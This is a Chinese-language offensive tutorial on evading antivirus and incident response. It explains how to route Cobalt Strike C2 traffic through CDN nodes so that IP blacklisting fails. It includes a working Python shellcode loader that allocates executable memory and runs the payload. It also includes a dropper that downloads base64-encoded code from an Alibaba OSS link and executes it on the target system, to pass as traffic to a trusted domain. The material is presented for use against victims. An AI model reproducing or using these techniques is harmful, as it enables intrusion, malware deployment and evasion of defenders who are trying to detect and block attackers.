免杀对抗-防溯源拉黑+防流量审计

防朔源拉黑-CDN节点

1.购买一个域名，开启开启cdn

2.全球ping一下域名，可以看到cdn生效

3.根据自己cs版本修改对应c2项目文件

下载：https://github.com/threatexpress/malleable-c2

打开文件搜索http-get，将如下图修改为设置cdn的域名

搜索http-post，将如下图修改为设置cdn的域名

4.将该文件上传到服务端cs目录下

5.服务端启动cs时，执行命令：./teamserver ip 密码 jquery-c2.4.3.profile

6.启动客户端cs连接，创建监听器。将下图位置填写为设置cdn的域名。

7.如此防溯源拉黑操作就完成了

        当设置木马远程连接的地址是本机真实ip时，对方可以使用流量监测工具看到网络外联，当其拉黑ip后我们便不能正常通信了。
        配置cdn，让木马远程连接的地址是我们域名上配置的cdn节点，就算拉黑某个cdn节点的ip，其他的cdn节点ip也会顶替上来，还是能够正常通信。

防流量审计-OSS存储-上线

1.阿里云配置OSS对象存储

2.将如下加载代码替换shellcode后进行base64编码

加载器代码：

import ctypes

shellcode=b'你的shellcode'

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))

handle = ctypes.windll.kernel32.CreateThread(0, 0,ctypes.c_uint64(rwxpage), 0, 0, 0)

ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

编码：

编码成功保存到txt文件中

3.将txt文件上传到阿里云oss，上传成功点击分享，获取访问链接

4.将访问链接写入如下python加载代码

代码：http.py

import ctypes,base64

from urllib.request import urlopen

url=urlopen("访问链接")

z=url.read()

zx=base64.b64decode(z)

exec(zx)

5.将http.py上传到目标系统，使用python执行即可上线(也可以打包成exe程序上传)。

绕过检测

成功上线

6.为什么使用OSS？

在做shellcode分离时，如果从一个不受信任的url加载shellcode，可能会被杀软检测拦截。
使用阿里云的OSS存储，加载shellcode文件，那么url是阿里云的，是绿标网站，就会被杀软放行。